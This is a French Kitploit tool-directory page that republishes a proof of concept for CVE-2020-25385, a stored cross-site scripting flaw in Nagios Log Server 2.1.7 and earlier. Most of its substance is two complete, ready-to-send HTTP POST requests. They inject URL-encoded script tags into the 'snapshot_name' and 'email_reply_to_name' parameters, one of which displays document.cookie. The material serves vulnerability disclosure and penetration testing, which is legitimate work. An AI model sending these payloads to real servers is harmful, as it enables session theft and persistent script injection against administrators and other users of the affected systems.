Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Nagios-Log-Server-2.1.7-Persistent-Cross-Site-Scripting — Une cross-site scripting (XSS) stockée dans Nagios Log Server 2.1.7 peut permettre à un attaquant d'effectuer des actions malveillantes sur les utilisateurs qui ouvrent un lien spécialement conçu ou une page web tierce. | Kitploit
Outils/GitHubGitHub/emreovunc/nagios-log-server-2.1.7-persistent-cross-site-scripting
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'Intrusion
GitHubemreovunc/nagios-log-server-2.1.7-persistent-cross-site-scripting

Nagios-Log-Server-2.1.7-Persistent-Cross-Site-Scripting

Une cross-site scripting (XSS) stockée dans Nagios Log Server 2.1.7 peut permettre à un attaquant d'effectuer des actions malveillantes sur les utilisateurs qui ouvrent un lien spécialement conçu ou une page web tierce.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
32il y a 5 ansPas encore vérifié

Nagios-Log-Server-2.1.7-Persistent-Cross-Site-Scripting

Un script intersite stocké (XSS) dans Nagios Log Server 2.1.7 peut permettre à un attaquant d'exécuter des actions malveillantes sur les utilisateurs qui ouvrent un lien conçu de manière malveillante ou une page web tierce.

Nagios Log Server 2.1.7 et les versions antérieures sont affectés par ces vulnérabilités.

CVE-2020-25385

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25385

PoC-1

Pour exploiter la vulnérabilité, un attaquant peut utiliser une requête POST vers '/nagioslogserver/configure/create_snapshot' en manipulant le paramètre 'snapshot_name' dans le corps de la requête afin d'impacter les utilisateurs qui ouvrent un lien conçu de manière malveillante ou une page web tierce.

root@kitploit:~
POST /nagioslogserver/configure/create_snapshot HTTP/1.1
Host: [TARGET]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 117
DNT: 1
Connection: close
Cookie: csrf_ls=b3bef5c1a2ef6e4c233282d1c1c229fd; ls_session=883lergotgcjbh9bjgaeakosv5go2gbb; PHPSESSID=nbah0vkmibpudd1qh7qgnpgo53
Upgrade-Insecure-Requests: 1

csrf_ls=b3bef5c1a2ef6e4c233282d1c1c229fd&snapshot_name=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E

PoC-2

Pour exploiter la vulnérabilité, un attaquant peut utiliser une requête POST vers '/nagioslogserver/admin/mail' en manipulant le paramètre 'email_reply_to_name' dans le corps de la requête afin d'impacter les utilisateurs qui ouvrent un lien conçu de manière malveillante ou une page web tierce.

root@kitploit:~
POST /nagioslogserver/admin/mail HTTP/1.1
Host: [TARGET]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 291
DNT: 1
Connection: close
Cookie: csrf_ls=6e418c757282ab5c4785dad327238158; ls_session=pscogfricmnpe9kpvbtcuccn8mfempgp
Upgrade-Insecure-Requests: 1

csrf_ls=6e418c757282ab5c4785dad327238158&email_from_name=Nagios+Log+Server&email_from=root%40localhost&email_reply_to_name=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&email_reply_to=root%40localhost&email_method=mail&smtp_host=&smtp_crypto=&smtp_port=25&smtp_user=&smtp_pass=

Télécharger l’outil